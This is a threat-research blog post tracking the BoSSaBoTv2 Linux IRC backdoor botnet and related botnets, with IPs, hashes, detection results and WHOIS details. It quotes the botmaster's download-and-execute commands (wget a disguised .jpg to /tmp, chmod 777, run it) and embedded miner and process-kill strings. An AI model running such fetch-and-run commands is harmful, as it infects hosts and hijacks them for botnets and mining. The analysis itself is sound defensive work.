[en] BoSSaBoTv2 : another Linux Backdoor IRC

Today, i was looking at my web honeypot and this one pay my attention : https://www.malekal.com/modsec/index.php?ip=178.32.59.202
The PHP vulnerability is very used (already wrote something about it : https://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time i saw thoses base64decode code.

The code lead to haxmeup.uni.me (192.95.12.34 – OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

so i launch it :

BoSSaBoTv2_modsec
BoSSaBoTv2_ircbackdoor

 

made a connection to 37.59.74.161 (OVH again) port 8067, there is an ircd behind :

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

so an IRC Backdoor.

BoSSaBoTv2_ircbackdoor2
Another surprise, the ircd doesnt have any mod to hide users etc.
~40 bots, not so much.
So let’s play.
BoSSaBoTv2_ircbackdoor3

on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers.
We can see that the exploit at 200.185.236.85 was successfull because it joins the channel as a new bot.
BoSSaBoTv2_ircbackdoor4confirmed by my VM.
We got an other DNS con32.cz.cc that give the same IP 192.95.12.34
BoSSaBoTv2_ircbackdoor5

Two new bots :

BoSSaBoTv2_ircbackdoor6

The IRCd is new around ~40 bots in 9 days :

BoSSaBoTv2_ircbackdoor_ircd

The botmaster made regularly download new binary – all from www.bilder-upload.eu (seems legitim)

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab

Some Hashs and Hosts recap :
haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH)
haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
http://malwaredb.malekal.com/index.php?hash=b36de738b5a807529f343f25a8ace0e0
http://malwaredb.malekal.com/index.php?hash=e9bb00d0faea2529cd5cc64147affdc4

BoSSaBoTv2_md5

then i wrote a little script to send the email abuse, hope, they will lose some bots 🙂

BoSSaBoTv2_abuse

 

MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin capabilities :

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s

The most interresting :

000000007E1D   BoSSaBoTv2-%s

a search at Google this topic on http://www.hackforums.net/showthread.php?tid=4395309
According the date post, the kit is new and the price is at 100$

BoSSaBoTv2_ircbackdoor_disclosure

EDIT – September 8

Back, lot of attacks this WE :

https://www.malekal.com/modsec/index.php?ip=213.73.31.13
https://www.malekal.com/modsec/index.php?ip=195.154.140.251
https://www.malekal.com/modsec/index.php?ip=5.135.64.105
https://www.malekal.com/modsec/index.php?ip=46.105.230.91
https://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd : 23.95.10.101 port 53

BossaBot_comeback

EDIT – September 21 2014 : Two botnets

We found two differents botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t
The IRCd move to IRC.DREAMBOXDB.COM (23.95.10.101:53/TCP) (binary http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian :

IRCBot_sloboz_downloadIRCBot_sloboz_download2

He made download a .tgz : http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A : https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/

IRCBot_sloboz

it’s an IRCBackdoor – it connects to channels #linuxmafia and #m@trix on differents ircd including undernet network.
We can see the master is imp / sloboz / demo with a 23.* range IP (same Range as the BossaBackdoor C&C)

IRCBot_sloboz3

IRCBot_sloboz2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

So i connect to undernet and the guy sloboz was also connected.
He use the same IP as the BossaBackdoor C&C : 23.95.10.101

IRCBot_sloboz5

IRCBot_sloboz4

As you can see there some G-Lined resulting of Virus Detection, this is the .tgz IRCBackdoor.

IRCBot_sloboz6

I also find this old topic where someone claim to get his nickname stolen on undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is : *** HeyHey is sloboz@86.104.220.177
The range lead to a Romaniam IP Range.

According this Urban dictionnary : http://www.urbandictionary.com/define.php?term=sloboz
There is also a City in Romania called Slobozia.

Seems he lose all his bots.

very pleased to see that antivirus has moved for his binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256: bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
Nom du fichier : vti-rescan
Ratio de détection : 16 / 53
Date d’analyse : 2014-09-15 09:55:35 UTC (il y a 6 jours, 3 heures)
Antivirus Résultat Mise à jour
Ad-Aware Backdoor.BossaBot.A 20140915
Avast ELF:BossaBot-A [Trj] 20140915
BitDefender Backdoor.BossaBot.A 20140915
DrWeb Linux.BackDoor.Irc.4 20140915
Emsisoft Backdoor.BossaBot.A (B) 20140915
F-Secure Backdoor.BossaBot.A 20140915
GData Backdoor.BossaBot.A 20140915
Ikarus Backdoor.BossaBot 20140915
Kaspersky HEUR:Backdoor.Linux.Bassobo.a 20140915
MicroWorld-eScan Backdoor.BossaBot.A 20140915
Norman BossaBot.A 20140914
Sophos Linux/BosaBot-A 20140915
Symantec Linux.Backdoor.Kaiten 20140915
Tencent Win32.Backdoor.Gen.Ugrc 20140915
TrendMicro-HouseCall ELF_BASSBOT.A 20140915
nProtect Backdoor.BossaBot.A 20140914

Snk / sult4n network

The second botnet – 2598 local users, if all are bots, this is not bad.
Notice the name Sult4n server.Bossa_sult4n

Binary : http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 – C&C SRV5050.CO ; KA3EK.COM ; IRCQFRUM.COM (1.34.224.120) & 8RB.SU (144.76.40.132)
All theses domains are registered with the email address : sullt4n@hotmail.com

 
Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com

 

A look at Google give others old domains registed with the same IPs used as C&C for Windows IRC Backdoor : zerx-virus.biz and x01bkr2.biz

  • April 2009 : http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • Mars 2010 : MSN Worms : http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013 http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was well known because i made a write up on it, about Win32.Phorpiex a Skype Worm (in French) : https://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAv, Urausy Ransomware, Crypted Ransomware, Spambot and others malwares.
exposedbotnets.com call him « Snk » : http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy is very active for years!

EDIT – May 5 2015 : Comeback

Around 15th April, new attack to push some BossaBot.
Still PHP attacks :

BoSSaBot_April_2015
and ShellShock attempt with two differents URLs :

BoSSaBot_April_2015_attack2 BoSSaBot_April_2015_attack

 

IRCd :

BossaBot_ircd

 

The domain is suspended : https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015 : still active

Some day ago, got this ShellShock Attempt but the link was not working.
I reconize the URL used by BossaBot.

ShellShock_BossaBot

Today more ShellShock Attempt, all from OVH.
Here the list :

37.59.149.136
91.121.4.163
94.23.248.135
94.23.63.125
188.165.210.224
94.23.20.161
188.165.245.68
188.165.220.171
188.165.253.55
94.23.4.99
188.165.237.170
91.121.199.85
91.121.47.52
91.121.223.149

ShellShock_BossaBot_3

Also some PHP stuffs as before :

ShellShock_BossaBot_2
Binaries are old, 5 mouths old :

https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/
https://www.virustotal.com/fr/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/1443073265/
https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/

but detections are still average :

SHA256: 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
Nom du fichier : susu2
Ratio de détection : 14 / 56
Date d’analyse : 2015-09-24 05:39:01 UTC (il y a 2 minutes)
Antivirus Résultat Mise à jour
AVG Linux/Tsunami 20150924
AhnLab-V3 Linux/Ssabobot.B 20150923
Avast ELF:Tsunami-BH [Cryp] 20150924
CAT-QuickHeal Linux.Ropys.PR6b5 20150924
DrWeb Linux.BackDoor.Sessox.1 20150924
ESET-NOD32 a variant of Linux/Tsunami.NAL 20150924
GData Linux.Trojan.Agent.750WU5 20150924
Jiangmin Backdoor/Linux.oo 20150922
Kaspersky HEUR:Backdoor.Linux.Ropys.a 20150924
NANO-Antivirus Trojan.Unix.Ropys.drxdby 20150924
Sophos Mal/Generic-S 20150923
Symantec Linux.Susiribot 20150923
Tencent Linux.Backdoor.Ropys.Liha 20150924
Zillya Trojan.Tsunami.Linux.80 20150923

The IRCd is at 93.189.4.131:53 (Cloud-Servers)
Same IRCd mod as before.

ShellShock_BossaBot_4

gonna ping some abuse =)

EDIT – 6 October : stil active

still new binaries, MalwareMustDie made also an interresting tweet with an image link : http://t.co/OgNkLxSQGe

BossaBot_MalwareMustDie

Print Friendly, PDF & Email
(Visité 812 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet